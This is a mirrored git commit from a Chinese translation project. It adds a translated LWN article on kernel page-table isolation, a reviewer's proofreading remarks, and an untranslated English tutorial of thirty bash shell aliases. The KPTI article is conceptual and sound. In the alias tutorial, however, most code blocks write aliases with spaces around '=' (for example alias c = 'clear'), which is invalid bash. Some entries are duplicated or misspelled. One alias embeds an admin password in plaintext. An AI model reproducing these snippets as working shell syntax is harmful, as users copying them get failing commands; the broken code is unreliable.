mirror of
https://github.com/LCTT/TranslateProject.git
synced 2025-03-21 02:10:11 +08:00
Merge remote-tracking branch 'upstream/master'
commit
ef7efe2323
@ -0,0 +1,54 @@
|
||||
KPTI:内核页表隔离的当前的发展
|
||||
============================================================
|
||||
|
||||
在十月底的时候,[KAISER][8] 补丁集被披露了;它做了一项工作,将内核空间与用户空间使用的<ruby>页表<rt>page tables</rt></ruby>进行了隔离,以解决 x86 处理器上向攻击者透露内核布局的安全漏洞。这些补丁是自它们被公布以来,这一星期中最值关注的事情,但是,它们似乎正在接近最终的状态。这应该是再次审视它们的合适机会。
|
||||
|
||||
这项工作被重命名为 “<ruby>内核页表隔离<rt>kernel page-table isolation</rt></ruby>” (KPTI),但是目的是一样的:分割页表,将现在被用户空间和内核空间共享使用的这张表分成两套,内核空间和用户空间各自使用一个。这对内核的内存管理产生了根本性的变化,并且,这也是这些年来为此问题进行争论的人所希望看到的,尤其是考虑到它的性能影响的时候。不过,KPTI 仍然处于快速发展的轨道上。[一组预备补丁][2] 已被被合并到 4.15 - rc4 之后的主版本线上了 — 一般情况下仅重要的修复才被允许这样做 — 并且其余的似乎被确定进入 4.16 版的合并窗口中。许多内核开发者都在这项工作上投入了大量的时间,并且 Linus Torvalds [要求][3] 将这项工作回迁到长期稳定内核中。
|
||||
|
||||
也就是说,KPTI 已经在最后期限的压力下安全补丁的所有标记都已经就绪了。对于任何基于 ARM 的读者,在这里值的注意的是,在这项工作中有一个 [为 arm64 的等效补丁集][4]。
|
||||
|
||||
### 51 个补丁乃至更多
|
||||
|
||||
在这篇文章中,x86 补丁系统在 [163 版本][5]。它包含 51 个补丁,因此,我们应该感谢那些没有公开的版本。最初的补丁集,由 Dave Hansen 发布,由 Thomas Gleixner、Peter Zijlstra、Andy Lutomirski、和 Hugh Dickins 根据许多其它人的建议,做了大量的修订。任何还存在于这项工作中的错误都不会是由于代码方面缺乏经验导致的。
|
||||
|
||||
在现代系统中,页表是以一个树形结构进行组织的,这样可以高效地存储稀疏内存映射和支持巨页特性;查看[这篇 2005 年的文章][6] 了解更多细节以及它是怎么工作的示意图。在一个有四级页面表的系统上(目前的大多数大型系统都是这样),顶级是页面全局目录(PGD)。紧接着是页面上层目录(PUD)、页面中层目录(PMD)和页面表条目(PTE)。有五级页面表的系统是在 PGD 下面插入了一层(称为 P4D)。
|
||||
|
||||
页面故障解析通常遍历整个树去查找所需的 PTE,但是,巨页可以被更高层级的特定条目所表示。例如,一个 2MB 的内存<ruby>块<rt>chunk</rt></ruby>既可以由 PMD 层级的一个单个的巨页条目表示,也可以由一个单页 PTE 条目的完整页面表示。
|
||||
|
||||
在当前的内核中,每个处理器有一个单个的 PGD;在 KPTI 系列补丁中所采取的第一步的其中一个措施是,去创建一个第二个 PGD。当内核运行时,原来的仍然在使用;它映射所有的地址空间。当处理器运行在用户空间时,(在打完该系列补丁之后)第二个被激活。它指向属于该进程的页面的相同目录层次,但是,描述内核空间(位于虚拟地址空间的顶端)的部分通常都不在这里。
|
||||
|
||||
页表条目包含权限描述位,它记录了内存该如何被访问;不用说都知道,这些位是用来设置阻止用户空间访问内核页面的,即便是通过那些被映射到该地址空间的页面访问。不幸的是,一些硬件级的错误允许用户空间的攻击者去确定一个给定的内核空间地址是否被映射,而不管那个页面上映射的地址是否被允许访问。而那个信息可以被用于击败内核地址空间布局随机化,可以使一个本地的攻击者更易于得逞。在 KPTI 背后的核心思想是,切换到一个没有内核空间映射的 PGD,将会使基于这个漏洞的攻击失效,而到现在为止,我们还没有看到这些攻击。
|
||||
|
||||
### 细节
|
||||
|
||||
这个想法很简单,但是,就像经常发生的那样,有很多麻烦的细节,这个简单的想法变成了一个 51 个部分的系列补丁。最初的问题是,如果处理器在用户模式运行时响应一个硬件中断,处理中断需要的内核代码将在地址空间中不存在。因此,必须有足够的内核代码映射在用户模式中,以能够切换回到内核 PGD,使剩余的代码也可用。对于 traps、非屏蔽中断、和系统调用,也存在一个相似的情况。这个代码很小而且可以与其它部分隔离,但是,在处理安全且有效地切换时,涉及到一些很复杂的细节。
|
||||
|
||||
另一个难题来自 x86 本地描述符表(LDT)的构成,它可以被用于去改变用户空间的内存布局。它可以使用鲜为人知的 [`modify_ldt()`][7] 系统调用来做微调。例如,在 Linux 上早期的 POSIX 线程实现,使用了 LDT 去创建一个本地线程存储区域。在现在的 Linux 系统上,LDT 几乎不再使用了,但是,一些应用程序(比如,Wine)仍然需要它。当它被使用时,LDT 必须能够被用户空间和内核空间都可以访问到,但是,它必须一直处于内核空间中。KPTI 补丁集清理内核附近的内存,在 PGD 级别上为 LDT 保留一个完全的条目;因此,`vmalloc()` 调用的可用空间收缩到仅有 12,800TB。那是一个非常巨大的 LDT 空间数,可以满足有很多 CPU 的系统需要。这种变化的其中一个结果是,LDT 的位置是固定的,并且已知道用户空间 — 一个潜在的问题是,因此可以通过覆写 LDT 来很容易地破坏整个系统。在这个系列的最终的补丁是映射为只读 LDT,以阻止此类攻击。
|
||||
|
||||
另一个潜在的漏洞是,如果内核一直可以被操纵返回到用户空间而无需切换到已净化的 PGD。因为内核空间 PGD 也映射用户空间内存,这种疏忽可能被忽视一段时间。对此的响应是将用户空间的虚拟地址部分映射为内核 PGD 的非可执行部分。用户空间使用了一个错误的页面表来开始运行,将会立即崩溃。
|
||||
|
||||
最后,虽然所有已存在的 x86 处理器似乎都会受到已经披露的漏洞信息的影响,但是,以后的处理器可能不会受此影响。KPTI 有一个可测量的运行时成本,估计在 5%。这个成本不应该由用户去承担,尤其是他们拿到了没有这个问题的新处理器时。将会有一个 `nopti` 内核命令行选项,可以在机器引导时去禁用它。这个补丁系列也增加了一个新的“特性”标识(`X86_BUG_CPU_INSECURE`)去标识有漏洞的 CPU;它被设置现在的所有 x86 CPU 上,但是在以后的硬件上可能没有。如果没有该特性标识,页面隔离将自动被关闭。
|
||||
|
||||
在 4.16 版的合并窗口打开之前剩下将近一个月。在这段时间里,KPTI 补丁集毫无疑问将通过一些更多的修改来解决一些必然的小问题。一旦稳定之后,这些代码将被合并,并且将会尽快回迁到稳定内核。显然,我们期待一个缓慢更新的 — 但是更安全的 — 内核,作为我们的新年礼物。
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://lwn.net/SubscriberLink/741878/eb6c9d3913d7cb2b/
|
||||
|
||||
作者:[Jonathan Corbet][a]
|
||||
译者:[qhwdw](https://github.com/qhwdw)
|
||||
校对:[wxy](https://github.com/wxy)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://lwn.net/SubscriberLink/741878/eb6c9d3913d7cb2b/
|
||||
[1]:https://lwn.net/Promo/slink-trial2-2/claim
|
||||
[2]:https://git.kernel.org/linus/64a48099b3b31568ac45716b7fafcb74a0c2fcfe
|
||||
[3]:https://lwn.net/Articles/741882/
|
||||
[4]:https://lwn.net/Articles/740393/
|
||||
[5]:https://lwn.net/Articles/741883/
|
||||
[6]:https://lwn.net/Articles/117749/
|
||||
[7]:http://man7.org/linux/man-pages/man2/modify_ldt.2.html
|
||||
[8]:https://lwn.net/Articles/738975/
|
||||
|
||||
|
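Review bot: the translated KPTI text needs a proofreading pass before merge: the paragraph on the 4.15-rc4 merge has a doubled character in "已被被合并", and the arm64 sentence writes "值的注意" where "值得注意" is meant. At the start of the "51 个补丁乃至更多" section, "x86 补丁系统在 [163 版本][5]" uses 补丁系统 while the rest of the article calls the series 补丁集 or 系列补丁, so the same term should be used there. The reference list defines [1] (the LWN promo link) although nothing in the body cites it, and [a] for the author points at the same SubscriberLink URL as the via: line rather than at an author page.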
@ -0,0 +1,541 @@
|
||||
translating by lujun9972
|
||||
30 Handy Bash Shell Aliases For Linux / Unix / Mac OS X
|
||||
======
|
||||
An bash alias is nothing but the shortcut to commands. The alias command allows the user to launch any command or group of commands (including options and filenames) by entering a single word. Use alias command to display a list of all defined aliases. You can add user-defined aliases to [~/.bashrc][1] file. You can cut down typing time with these aliases, work smartly, and increase productivity at the command prompt.
|
||||
|
||||
This post shows how to create and use aliases including 30 practical examples of bash shell aliases.
|
||||
[![30 Useful Bash Shell Aliase For Linux/Unix Users][2]][2]
|
||||
|
||||
## More about bash alias
|
||||
|
||||
The general syntax for the alias command for the bash shell is as follows:
|
||||
|
||||
### How to list bash aliases
|
||||
|
||||
Type the following [alias command][3]:
|
||||
`alias`
|
||||
Sample outputs:
|
||||
```
|
||||
alias ..='cd ..'
|
||||
alias amazonbackup='s3backup'
|
||||
alias apt-get='sudo apt-get'
|
||||
...
|
||||
|
||||
```
|
||||
|
||||
By default alias command shows a list of aliases that are defined for the current user.
|
||||
|
||||
### How to define or create a bash shell alias
|
||||
|
||||
To [create the alias][4] use the following syntax:
|
||||
```
|
||||
alias name =value
|
||||
alias name = 'command'
|
||||
alias name = 'command arg1 arg2'
|
||||
alias name = '/path/to/script'
|
||||
alias name = '/path/to/script.pl arg1'
|
||||
```
|
||||
|
||||
alias name=value alias name='command' alias name='command arg1 arg2' alias name='/path/to/script' alias name='/path/to/script.pl arg1'
|
||||
|
||||
In this example, create the alias **c** for the commonly used clear command, which clears the screen, by typing the following command and then pressing the ENTER key:
|
||||
```
|
||||
alias c = 'clear'
|
||||
```
|
||||
|
||||
|
||||
Then, to clear the screen, instead of typing clear, you would only have to type the letter 'c' and press the [ENTER] key:
|
||||
```
|
||||
c
|
||||
```
|
||||
|
||||
### How to disable a bash alias temporarily
|
||||
|
||||
An [alias can be disabled temporarily][5] using the following syntax:
|
||||
```
|
||||
## path/to/full/command
|
||||
/usr/bin/clear
|
||||
## call alias with a backslash ##
|
||||
\c
|
||||
## use /bin/ls command and avoid ls alias ##
|
||||
command ls
|
||||
```
|
||||
|
||||
### How to delete/remove a bash alias
|
||||
|
||||
You need to use the command [called unalias to remove aliases][6]. Its syntax is as follows:
|
||||
```
|
||||
unalias aliasname
|
||||
unalias foo
|
||||
```
|
||||
|
||||
In this example, remove the alias c which was created in an earlier example:
|
||||
```
|
||||
unalias c
|
||||
```
|
||||
|
||||
You also need to delete the alias from the [~/.bashrc file][1] using a text editor (see next section).
|
||||
|
||||
The alias c remains in effect only during the current login session. Once you logs out or reboot the system the alias c will be gone. To avoid this problem, add alias to your [~/.bashrc file][1], enter:
|
||||
```
|
||||
vi ~/.bashrc
|
||||
```
|
||||
|
||||
|
||||
The alias c for the current user can be made permanent by entering the following line:
|
||||
```
|
||||
alias c = 'clear'
|
||||
```
|
||||
|
||||
Save and close the file. System-wide aliases (i.e. aliases for all users) can be put in the /etc/bashrc file. Please note that the alias command is built into a various shells including ksh, tcsh/csh, ash, bash and others.
|
||||
|
||||
### A note about privileged access
|
||||
|
||||
You can add code as follows in ~/.bashrc:
|
||||
```
|
||||
# if user is not root, pass all commands via sudo #
|
||||
if [ $UID -ne 0 ]; then
|
||||
alias reboot='sudo reboot'
|
||||
alias update='sudo apt-get upgrade'
|
||||
fi
|
||||
```
|
||||
|
||||
### A note about os specific aliases
|
||||
|
||||
You can add code as follows in ~/.bashrc [using the case statement][7]:
|
||||
```
|
||||
### Get os name via uname ###
|
||||
_myos="$(uname)"
|
||||
|
||||
### add alias as per os using $_myos ###
|
||||
case $_myos in
|
||||
Linux) alias foo='/path/to/linux/bin/foo';;
|
||||
FreeBSD|OpenBSD) alias foo='/path/to/bsd/bin/foo' ;;
|
||||
SunOS) alias foo='/path/to/sunos/bin/foo' ;;
|
||||
*) ;;
|
||||
esac
|
||||
```
|
||||
|
||||
## 30 bash shell aliases examples
|
||||
|
||||
You can define various types aliases as follows to save time and increase productivity.
|
||||
|
||||
### #1: Control ls command output
|
||||
|
||||
The [ls command lists directory contents][8] and you can colorize the output:
|
||||
```
|
||||
## Colorize the ls output ##
|
||||
alias ls = 'ls --color=auto'
|
||||
|
||||
## Use a long listing format ##
|
||||
alias ll = 'ls -la'
|
||||
|
||||
## Show hidden files ##
|
||||
alias l.= 'ls -d . .. .git .gitignore .gitmodules .travis.yml --color=auto'
|
||||
```
|
||||
|
||||
### #2: Control cd command behavior
|
||||
```
|
||||
## get rid of command not found ##
|
||||
alias cd..= 'cd ..'
|
||||
|
||||
## a quick way to get out of current directory ##
|
||||
alias ..= 'cd ..'
|
||||
alias ...= 'cd ../../../'
|
||||
alias ....= 'cd ../../../../'
|
||||
alias .....= 'cd ../../../../'
|
||||
alias .4= 'cd ../../../../'
|
||||
alias .5= 'cd ../../../../..'
|
||||
```
|
||||
|
||||
### #3: Control grep command output
|
||||
|
||||
[grep command is a command-line utility for searching][9] plain-text files for lines matching a regular expression:
|
||||
```
|
||||
## Colorize the grep command output for ease of use (good for log files)##
|
||||
alias grep = 'grep --color=auto'
|
||||
alias egrep = 'egrep --color=auto'
|
||||
alias fgrep = 'fgrep --color=auto'
|
||||
```
|
||||
|
||||
### #4: Start calculator with math support
|
||||
```
|
||||
alias bc = 'bc -l'
|
||||
```
|
||||
|
||||
### #4: Generate sha1 digest
|
||||
```
|
||||
alias sha1 = 'openssl sha1'
|
||||
```
|
||||
|
||||
### #5: Create parent directories on demand
|
||||
|
||||
[mkdir command][10] is used to create a directory:
|
||||
```
|
||||
alias mkdir = 'mkdir -pv'
|
||||
```
|
||||
|
||||
### #6: Colorize diff output
|
||||
|
||||
You can [compare files line by line using diff][11] and use a tool called colordiff to colorize diff output:
|
||||
```
|
||||
# install colordiff package :)
|
||||
alias diff = 'colordiff'
|
||||
```
|
||||
|
||||
### #7: Make mount command output pretty and human readable format
|
||||
```
|
||||
alias mount = 'mount |column -t'
|
||||
```
|
||||
|
||||
### #8: Command short cuts to save time
|
||||
```
|
||||
# handy short cuts #
|
||||
alias h = 'history'
|
||||
alias j = 'jobs -l'
|
||||
```
|
||||
|
||||
### #9: Create a new set of commands
|
||||
```
|
||||
alias path = 'echo -e ${PATH//:/\\n}'
|
||||
alias now = 'date +"%T"'
|
||||
alias nowtime =now
|
||||
alias nowdate = 'date +"%d-%m-%Y"'
|
||||
```
|
||||
|
||||
### #10: Set vim as default
|
||||
```
|
||||
alias vi = vim
|
||||
alias svi = 'sudo vi'
|
||||
alias vis = 'vim "+set si"'
|
||||
alias edit = 'vim'
|
||||
```
|
||||
|
||||
### #11: Control output of networking tool called ping
|
||||
```
|
||||
# Stop after sending count ECHO_REQUEST packets #
|
||||
alias ping = 'ping -c 5'
|
||||
|
||||
# Do not wait interval 1 second, go fast #
|
||||
alias fastping = 'ping -c 100 -s.2'
|
||||
```
|
||||
|
||||
### #12: Show open ports
|
||||
|
||||
Use [netstat command][12] to quickly list all TCP/UDP port on the server:
|
||||
```
|
||||
alias ports = 'netstat -tulanp'
|
||||
```
|
||||
|
||||
### #13: Wakeup sleeping servers
|
||||
|
||||
[Wake-on-LAN (WOL) is an Ethernet networking][13] standard that allows a server to be turned on by a network message. You can [quickly wakeup nas devices][14] and server using the following aliases:
|
||||
```
|
||||
## replace mac with your actual server mac address #
|
||||
alias wakeupnas01 = '/usr/bin/wakeonlan 00:11:32:11:15:FC'
|
||||
alias wakeupnas02 = '/usr/bin/wakeonlan 00:11:32:11:15:FD'
|
||||
alias wakeupnas03 = '/usr/bin/wakeonlan 00:11:32:11:15:FE'
|
||||
```
|
||||
|
||||
### #14: Control firewall (iptables) output
|
||||
|
||||
[Netfilter is a host-based firewall][15] for Linux operating systems. It is included as part of the Linux distribution and it is activated by default. This [post list most common iptables solutions][16] required by a new Linux user to secure his or her Linux operating system from intruders.
|
||||
```
|
||||
## shortcut for iptables and pass it via sudo#
|
||||
alias ipt = 'sudo /sbin/iptables'
|
||||
|
||||
# display all rules #
|
||||
alias iptlist = 'sudo /sbin/iptables -L -n -v --line-numbers'
|
||||
alias iptlistin = 'sudo /sbin/iptables -L INPUT -n -v --line-numbers'
|
||||
alias iptlistout = 'sudo /sbin/iptables -L OUTPUT -n -v --line-numbers'
|
||||
alias iptlistfw = 'sudo /sbin/iptables -L FORWARD -n -v --line-numbers'
|
||||
alias firewall =iptlist
|
||||
```
|
||||
|
||||
### #15: Debug web server / cdn problems with curl
|
||||
```
|
||||
# get web server headers #
|
||||
alias header = 'curl -I'
|
||||
|
||||
# find out if remote server supports gzip / mod_deflate or not #
|
||||
alias headerc = 'curl -I --compress'
|
||||
```
|
||||
|
||||
### #16: Add safety nets
|
||||
```
|
||||
# do not delete / or prompt if deleting more than 3 files at a time #
|
||||
alias rm = 'rm -I --preserve-root'
|
||||
|
||||
# confirmation #
|
||||
alias mv = 'mv -i'
|
||||
alias cp = 'cp -i'
|
||||
alias ln = 'ln -i'
|
||||
|
||||
# Parenting changing perms on / #
|
||||
alias chown = 'chown --preserve-root'
|
||||
alias chmod = 'chmod --preserve-root'
|
||||
alias chgrp = 'chgrp --preserve-root'
|
||||
```
|
||||
|
||||
### #17: Update Debian Linux server
|
||||
|
||||
[apt-get command][17] is used for installing packages over the internet (ftp or http). You can also upgrade all packages in a single operations:
|
||||
```
|
||||
# distro specific - Debian / Ubuntu and friends #
|
||||
# install with apt-get
|
||||
alias apt-get= "sudo apt-get"
|
||||
alias updatey = "sudo apt-get --yes"
|
||||
|
||||
# update on one command
|
||||
alias update = 'sudo apt-get update && sudo apt-get upgrade'
|
||||
```
|
||||
|
||||
### #18: Update RHEL / CentOS / Fedora Linux server
|
||||
|
||||
[yum command][18] is a package management tool for RHEL / CentOS / Fedora Linux and friends:
|
||||
```
|
||||
## distrp specifc RHEL/CentOS ##
|
||||
alias update = 'yum update'
|
||||
alias updatey = 'yum -y update'
|
||||
```
|
||||
|
||||
### #19: Tune sudo and su
|
||||
```
|
||||
# become root #
|
||||
alias root = 'sudo -i'
|
||||
alias su = 'sudo -i'
|
||||
```
|
||||
|
||||
### #20: Pass halt/reboot via sudo
|
||||
|
||||
[shutdown command][19] bring the Linux / Unix system down:
|
||||
```
|
||||
# reboot / halt / poweroff
|
||||
alias reboot = 'sudo /sbin/reboot'
|
||||
alias poweroff = 'sudo /sbin/poweroff'
|
||||
alias halt = 'sudo /sbin/halt'
|
||||
alias shutdown = 'sudo /sbin/shutdown'
|
||||
```
|
||||
|
||||
### #21: Control web servers
|
||||
```
|
||||
# also pass it via sudo so whoever is admin can reload it without calling you #
|
||||
alias nginxreload = 'sudo /usr/local/nginx/sbin/nginx -s reload'
|
||||
alias nginxtest = 'sudo /usr/local/nginx/sbin/nginx -t'
|
||||
alias lightyload = 'sudo /etc/init.d/lighttpd reload'
|
||||
alias lightytest = 'sudo /usr/sbin/lighttpd -f /etc/lighttpd/lighttpd.conf -t'
|
||||
alias httpdreload = 'sudo /usr/sbin/apachectl -k graceful'
|
||||
alias httpdtest = 'sudo /usr/sbin/apachectl -t && /usr/sbin/apachectl -t -D DUMP_VHOSTS'
|
||||
```
|
||||
|
||||
### #22: Alias into our backup stuff
|
||||
```
|
||||
# if cron fails or if you want backup on demand just run these commands #
|
||||
# again pass it via sudo so whoever is in admin group can start the job #
|
||||
# Backup scripts #
|
||||
alias backup = 'sudo /home/scripts/admin/scripts/backup/wrapper.backup.sh --type local --taget /raid1/backups'
|
||||
alias nasbackup = 'sudo /home/scripts/admin/scripts/backup/wrapper.backup.sh --type nas --target nas01'
|
||||
alias s3backup = 'sudo /home/scripts/admin/scripts/backup/wrapper.backup.sh --type nas --target nas01 --auth /home/scripts/admin/.authdata/amazon.keys'
|
||||
alias rsnapshothourly = 'sudo /home/scripts/admin/scripts/backup/wrapper.rsnapshot.sh --type remote --target nas03 --auth /home/scripts/admin/.authdata/ssh.keys --config /home/scripts/admin/scripts/backup/config/adsl.conf'
|
||||
alias rsnapshotdaily = 'sudo /home/scripts/admin/scripts/backup/wrapper.rsnapshot.sh --type remote --target nas03 --auth /home/scripts/admin/.authdata/ssh.keys --config /home/scripts/admin/scripts/backup/config/adsl.conf'
|
||||
alias rsnapshotweekly = 'sudo /home/scripts/admin/scripts/backup/wrapper.rsnapshot.sh --type remote --target nas03 --auth /home/scripts/admin/.authdata/ssh.keys --config /home/scripts/admin/scripts/backup/config/adsl.conf'
|
||||
alias rsnapshotmonthly = 'sudo /home/scripts/admin/scripts/backup/wrapper.rsnapshot.sh --type remote --target nas03 --auth /home/scripts/admin/.authdata/ssh.keys --config /home/scripts/admin/scripts/backup/config/adsl.conf'
|
||||
alias amazonbackup =s3backup
|
||||
```
|
||||
|
||||
### #23: Desktop specific - play avi/mp3 files on demand
|
||||
```
|
||||
## play video files in a current directory ##
|
||||
# cd ~/Download/movie-name
|
||||
# playavi or vlc
|
||||
alias playavi = 'mplayer *.avi'
|
||||
alias vlc = 'vlc *.avi'
|
||||
|
||||
# play all music files from the current directory #
|
||||
alias playwave = 'for i in *.wav; do mplayer "$i"; done'
|
||||
alias playogg = 'for i in *.ogg; do mplayer "$i"; done'
|
||||
alias playmp3 = 'for i in *.mp3; do mplayer "$i"; done'
|
||||
|
||||
# play files from nas devices #
|
||||
alias nplaywave = 'for i in /nas/multimedia/wave/*.wav; do mplayer "$i"; done'
|
||||
alias nplayogg = 'for i in /nas/multimedia/ogg/*.ogg; do mplayer "$i"; done'
|
||||
alias nplaymp3 = 'for i in /nas/multimedia/mp3/*.mp3; do mplayer "$i"; done'
|
||||
|
||||
# shuffle mp3/ogg etc by default #
|
||||
alias music = 'mplayer --shuffle *'
|
||||
```
|
||||
|
||||
|
||||
### #24: Set default interfaces for sys admin related commands
|
||||
|
||||
[vnstat is console-based network][20] traffic monitor. [dnstop is console tool][21] to analyze DNS traffic. [tcptrack and iftop commands displays][22] information about TCP/UDP connections it sees on a network interface and display bandwidth usage on an interface by host respectively.
|
||||
```
|
||||
## All of our servers eth1 is connected to the Internets via vlan / router etc ##
|
||||
alias dnstop = 'dnstop -l 5 eth1'
|
||||
alias vnstat = 'vnstat -i eth1'
|
||||
alias iftop = 'iftop -i eth1'
|
||||
alias tcpdump = 'tcpdump -i eth1'
|
||||
alias ethtool = 'ethtool eth1'
|
||||
|
||||
# work on wlan0 by default #
|
||||
# Only useful for laptop as all servers are without wireless interface
|
||||
alias iwconfig = 'iwconfig wlan0'
|
||||
```
|
||||
|
||||
### #25: Get system memory, cpu usage, and gpu memory info quickly
|
||||
```
|
||||
## pass options to free ##
|
||||
alias meminfo = 'free -m -l -t'
|
||||
|
||||
## get top process eating memory
|
||||
alias psmem = 'ps auxf | sort -nr -k 4'
|
||||
alias psmem10 = 'ps auxf | sort -nr -k 4 | head -10'
|
||||
|
||||
## get top process eating cpu ##
|
||||
alias pscpu = 'ps auxf | sort -nr -k 3'
|
||||
alias pscpu10 = 'ps auxf | sort -nr -k 3 | head -10'
|
||||
|
||||
## Get server cpu info ##
|
||||
alias cpuinfo = 'lscpu'
|
||||
|
||||
## older system use /proc/cpuinfo ##
|
||||
##alias cpuinfo='less /proc/cpuinfo' ##
|
||||
|
||||
## get GPU ram on desktop / laptop##
|
||||
alias gpumeminfo = 'grep -i --color memory /var/log/Xorg.0.log'
|
||||
```
|
||||
|
||||
### #26: Control Home Router
|
||||
|
||||
The curl command can be used to [reboot Linksys routers][23].
|
||||
```
|
||||
# Reboot my home Linksys WAG160N / WAG54 / WAG320 / WAG120N Router / Gateway from *nix.
|
||||
alias rebootlinksys = "curl -u 'admin:my-super-password' 'http://192.168.1.2/setup.cgi?todo=reboot'"
|
||||
|
||||
# Reboot tomato based Asus NT16 wireless bridge
|
||||
alias reboottomato = "ssh admin@192.168.1.1 /sbin/reboot"
|
||||
```
|
||||
|
||||
### #27 Resume wget by default
|
||||
|
||||
The [GNU Wget is a free utility for non-interactive download][25] of files from the Web. It supports HTTP, HTTPS, and FTP protocols, and it can resume downloads too:
|
||||
```
|
||||
## this one saved by butt so many times ##
|
||||
alias wget = 'wget -c'
|
||||
```
|
||||
|
||||
### #28 Use different browser for testing website
|
||||
```
|
||||
## this one saved by butt so many times ##
|
||||
alias ff4 = '/opt/firefox4/firefox'
|
||||
alias ff13 = '/opt/firefox13/firefox'
|
||||
alias chrome = '/opt/google/chrome/chrome'
|
||||
alias opera = '/opt/opera/opera'
|
||||
|
||||
#default ff
|
||||
alias ff =ff13
|
||||
|
||||
#my default browser
|
||||
alias browser =chrome
|
||||
```
|
||||
|
||||
### #29: A note about ssh alias
|
||||
|
||||
Do not create ssh alias, instead use ~/.ssh/config OpenSSH SSH client configuration files. It offers more option. An example:
|
||||
```
|
||||
Host server10
|
||||
Hostname 1.2.3.4
|
||||
IdentityFile ~/backups/.ssh/id_dsa
|
||||
user foobar
|
||||
Port 30000
|
||||
ForwardX11Trusted yes
|
||||
TCPKeepAlive yes
|
||||
```
|
||||
|
||||
Host server10 Hostname 1.2.3.4 IdentityFile ~/backups/.ssh/id_dsa user foobar Port 30000 ForwardX11Trusted yes TCPKeepAlive yes
|
||||
|
||||
You can now connect to peer1 using the following syntax:
|
||||
`$ ssh server10`
|
||||
|
||||
### #30: It's your turn to share…
|
||||
|
||||
```
|
||||
## set some other defaults ##
|
||||
alias df = 'df -H'
|
||||
alias du = 'du -ch'
|
||||
|
||||
# top is atop, just like vi is vim
|
||||
alias top = 'atop'
|
||||
|
||||
## nfsrestart - must be root ##
|
||||
## refresh nfs mount / cache etc for Apache ##
|
||||
alias nfsrestart = 'sync && sleep 2 && /etc/init.d/httpd stop && umount netapp2:/exports/http && sleep 2 && mount -o rw,sync,rsize=32768,wsize=32768,intr,hard,proto=tcp,fsc natapp2:/exports /http/var/www/html && /etc/init.d/httpd start'
|
||||
|
||||
## Memcached server status ##
|
||||
alias mcdstats = '/usr/bin/memcached-tool 10.10.27.11:11211 stats'
|
||||
alias mcdshow = '/usr/bin/memcached-tool 10.10.27.11:11211 display'
|
||||
|
||||
## quickly flush out memcached server ##
|
||||
alias flushmcd = 'echo "flush_all" | nc 10.10.27.11 11211'
|
||||
|
||||
## Remove assets quickly from Akamai / Amazon cdn ##
|
||||
alias cdndel = '/home/scripts/admin/cdn/purge_cdn_cache --profile akamai'
|
||||
alias amzcdndel = '/home/scripts/admin/cdn/purge_cdn_cache --profile amazon'
|
||||
|
||||
## supply list of urls via file or stdin
|
||||
alias cdnmdel = '/home/scripts/admin/cdn/purge_cdn_cache --profile akamai --stdin'
|
||||
alias amzcdnmdel = '/home/scripts/admin/cdn/purge_cdn_cache --profile amazon --stdin'
|
||||
```
|
||||
|
||||
## Conclusion
|
||||
|
||||
This post summarizes several types of uses for *nix bash aliases:
|
||||
|
||||
1. Setting default options for a command (e.g. set eth0 as default option for ethtool command via alias ethtool='ethtool eth0' ).
|
||||
2. Correcting typos (cd.. will act as cd .. via alias cd..='cd ..').
|
||||
3. Reducing the amount of typing.
|
||||
4. Setting the default path of a command that exists in several versions on a system (e.g. GNU/grep is located at /usr/local/bin/grep and Unix grep is located at /bin/grep. To use GNU grep use alias grep='/usr/local/bin/grep' ).
|
||||
5. Adding the safety nets to Unix by making commands interactive by setting default options. (e.g. rm, mv, and other commands).
|
||||
6. Compatibility by creating commands for older operating systems such as MS-DOS or other Unix like operating systems (e.g. alias del=rm ).
|
||||
|
||||
|
||||
|
||||
I've shared my aliases that I used over the years to reduce the need for repetitive command line typing. If you know and use any other bash/ksh/csh aliases that can reduce typing, share below in the comments.
|
||||
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.cyberciti.biz/tips/bash-aliases-mac-centos-linux-unix.html
|
||||
|
||||
作者:[nixCraft][a]
|
||||
译者:[lujun9972](https://github.com/lujun9972)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.cyberciti.biz
|
||||
[1]:https://bash.cyberciti.biz/guide/~/.bashrc
|
||||
[2]:https://www.cyberciti.biz/tips/wp-content/uploads/2012/06/Getting-Started-With-Bash-Shell-Aliases-For-Linux-Unix.jpg
|
||||
[3]://www.cyberciti.biz/tips/bash-aliases-mac-centos-linux-unix.html (See Linux/Unix alias command examples for more info)
|
||||
[4]:https://bash.cyberciti.biz/guide/Create_and_use_aliases
|
||||
[5]://www.cyberciti.biz/faq/bash-shell-temporarily-disable-an-alias/
|
||||
[6]:https://bash.cyberciti.biz/guide/Create_and_use_aliases#How_do_I_remove_the_alias.3F
|
||||
[7]:https://bash.cyberciti.biz/guide/The_case_statement
|
||||
[8]://www.cyberciti.biz/faq/ls-command-to-examining-the-filesystem/
|
||||
[9]://www.cyberciti.biz/faq/howto-use-grep-command-in-linux-unix/
|
||||
[10]://www.cyberciti.biz/faq/linux-make-directory-command/
|
||||
[11]://www.cyberciti.biz/faq/how-do-i-compare-two-files-under-linux-or-unix/
|
||||
[12]://www.cyberciti.biz/faq/how-do-i-find-out-what-ports-are-listeningopen-on-my-linuxfreebsd-server/
|
||||
[13]://www.cyberciti.biz/tips/linux-send-wake-on-lan-wol-magic-packets.html
|
||||
[14]:https://bash.cyberciti.biz/misc-shell/simple-shell-script-to-wake-up-nas-devices-computers/
|
||||
[15]://www.cyberciti.biz/faq/rhel-fedorta-linux-iptables-firewall-configuration-tutorial/ (iptables CentOS/RHEL/Fedora tutorial)
|
||||
[16]://www.cyberciti.biz/tips/linux-iptables-examples.html
|
||||
[17]://www.cyberciti.biz/tips/linux-debian-package-management-cheat-sheet.html
|
||||
[18]://www.cyberciti.biz/faq/rhel-centos-fedora-linux-yum-command-howto/
|
||||
[19]://www.cyberciti.biz/faq/howto-shutdown-linux/
|
||||
[20]://www.cyberciti.biz/tips/keeping-a-log-of-daily-network-traffic-for-adsl-or-dedicated-remote-linux-box.html
|
||||
[21]://www.cyberciti.biz/faq/dnstop-monitor-bind-dns-server-dns-network-traffic-from-a-shell-prompt/
|
||||
[22]://www.cyberciti.biz/faq/check-network-connection-linux/
|
||||
